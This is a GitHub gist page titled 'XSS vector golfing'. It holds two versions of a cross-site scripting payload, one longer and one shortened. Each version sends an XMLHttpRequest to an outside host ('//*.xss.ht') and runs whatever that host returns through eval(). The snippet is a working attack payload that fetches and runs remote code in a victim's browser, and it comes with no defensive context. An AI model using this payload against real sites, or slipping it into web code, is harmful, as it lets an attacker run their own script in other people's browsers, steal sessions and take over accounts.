Skip to content

Instantly share code, notes, and snippets.

@Prinzhorn

Prinzhorn/xss-golf.js

Last active July 26, 2017 16:34
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Prinzhorn/3290622c98776c42613d5dbda9de3b82 to your computer and use it in GitHub Desktop.
Save Prinzhorn/3290622c98776c42613d5dbda9de3b82 to your computer and use it in GitHub Desktop.
Download ZIP
XSS vector golfing
Raw
xss-golf.js
//Before
function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//*.xss.ht");a.send();
//After
with(new XMLHttpRequest){onload=a=>eval(responseText);open("GET", "//*.xss.ht");send()}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment